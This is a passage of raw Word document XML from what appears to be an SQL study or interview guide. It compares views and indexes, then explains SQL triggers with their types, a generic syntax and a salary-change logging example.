            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AC59120"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A virtual table defined by a SELECT query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485D4C78"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A database object that improves query performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="083DC8A9" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70C4100D"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Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA8BFB4"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Does not store data, only a query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CF3554"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tores pointers to rows in the table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="1B535AD3" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4547B983"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lastRenderedPageBreak/>
              <w:t>Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA4A051"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implifies complex queries or restricts access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25A73971"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peeds up query execution by allowing faster lookups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="779B1925" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D02206"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B6240F"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Has no impact on performance (depends on query)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0492322A"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mproves query performance, especially SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="42C20B36" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1420A0DF"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ata Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C84B60"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an be read-only or updatable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19007CD7"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annot directly modify data (only used for search optimization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="2908CD2C" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2934FEEB"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reation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71245137"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d using CREATE VIEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194C8EA3"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d using CREATE INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="2D0F0EE7" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51B3CF2D"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ost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1FC20B"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No direct cost, but can increase query complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F6411E3"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ncreases storage and update costs (due to maintenance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35BB7ACD"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n summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462DDDD"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Views</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a way to present data in a more readable or restricted manner without changing the underlying data structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE66DDC" w14:textId="77777777" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to enhance the performance of data retrieval operations at the cost of additional storage and slower write operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B1E6C" w14:textId="5B8689A5" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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3B5ABA4">
          <v:rect id="_x0000_i2998" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD6E43" w14:textId="5334823B" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="001D1EE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="718" w:name="_Toc196308198"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Trigger in SQL? What is the use of Trigger in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="718"/>
    </w:p>
    <w:p w14:paraId="02FB2089" w14:textId="35A2213A" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL is a special kind of stored procedure that automatically executes or fires when a specific event occurs on a table or view. The event could be an </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation. Triggers are often used to enforce data integrity, automatically update or log changes, or perform actions in response to specific changes in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771BD59F" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Key Points About Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF3B44"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Automated Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers are fired automatically by the database when a specified event occurs on a table or view. You do not need to manually invoke a trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1458A"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Types of Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2205B4ED" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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BEFORE Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes before the triggering event (INSERT, UPDATE, DELETE) is performed on the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFAA0F8" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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AFTER Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes after the triggering event (INSERT, UPDATE, DELETE) is performed on the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE1EC3" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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INSTEAD OF Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to perform an action instead of the triggering event (typically used with views).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF026C"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Actions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers can perform various actions such as modifying data, logging information, or even preventing certain operations from being performed (such as preventing a delete operation if certain conditions aren't met).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CAC12"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vent-Driven</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers are event-driven and tied to a specific database event such as inserting a new record or updating a column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A20948" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Syntax for Creating a Trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604AC15B"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The syntax for creating a trigger depends on the SQL database you're using, but here’s a general structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE8B4B9"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TRIGGER trigger_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3069EFEE"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BEFORE|AFTER} {INSERT|UPDATE|DELETE} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B264551"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ON table_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E15AF"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FOR EACH ROW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2ABBA"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12A72E"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   -- trigger action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A47AC8"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42073A26" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Example of Trigger in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4EA86F"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Let's assume you have an employees table, and you want to automatically log every time an employee's salary is updated in the salary_changes_log table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A081FE"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Table Definitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A7B4AD"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TABLE employees (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB5506"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    employee_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05898A8B"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    employee_name VARCHAR(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894B54A"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    salary DECIMAL(10, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB939A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A4BDF" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF" w:rsidP="0085313D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1D6414"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TABLE salary_changes_log (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E954AB3"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    log_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FA365"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    employee_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C48F6"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    old_salary DECIMAL(10, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257D52B"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    new_salary DECIMAL(10, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E999741"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    change_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C8123"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13030478"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Trigger to Log Salary Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF20AB"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TRIGGER log_salary_changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26253F5A"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AFTER UPDATE ON employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC23A7"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FOR EACH ROW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0B434"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E1684"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    IF OLD.salary &lt;&gt; NEW.salary THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2A7CF"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        INSERT INTO salary_changes_log (employee_id, old_salary, new_salary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C9295"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        VALUES (NEW.employee_id, OLD.salary, NEW.salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103024A4"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    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA5822"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13DECE"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n this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41573F21"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The trigger log_salary_changes is fired </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AFTER UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DBAF7"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f the salary of an employee changes, the trigger will insert the old and new salary into the salary_changes_log table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A77BC" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Use of Triggers in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0579E"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Triggers are used in various scenarios. Some common use cases include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E0697"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nforcing Business Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F9F8E" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Preventing a certain action (e.g., DELETE) from occurring if some condition is not met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08D61D" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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For example, preventing the deletion of a record from the employees table if an employee has ongoing tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470AF3F8"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Auditing and Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E5E58" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Automatically logging changes to sensitive data for auditing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B60301" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Triggers can log any data modifications (INSERT, UPDATE, DELETE) to an audit table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DF736"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nforcing Referential Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01218ECA" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Ensuring that certain data relationships are maintained automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F8963" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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For example, if you delete an employee, you might want to automatically remove their associated records from a related table (like tasks or projects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F6A007"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Automatically Updating Data</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466307E" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Automatically updating certain columns in response to data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F26AB" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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For instance, if you update a price in the products table, you might want to automatically recalculate the stock value in an inventory table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B403F"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ata Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC675D" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Triggers can enforce complex validation rules before inserting or updating data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D61049" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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For example, ensuring that an employee’s salary is always greater than a certain threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B8E84"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Preventing Invalid Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D76188" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Automatically rolling back transactions that do not meet certain conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C55062" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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For example, preventing an update to a bank_balance if the amount is less than zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A99F5C" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Advantages of Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A536B82"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Automation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers automate the execution of certain actions in response to changes in data, which reduces manual effort.</w:t>
      </w:r>
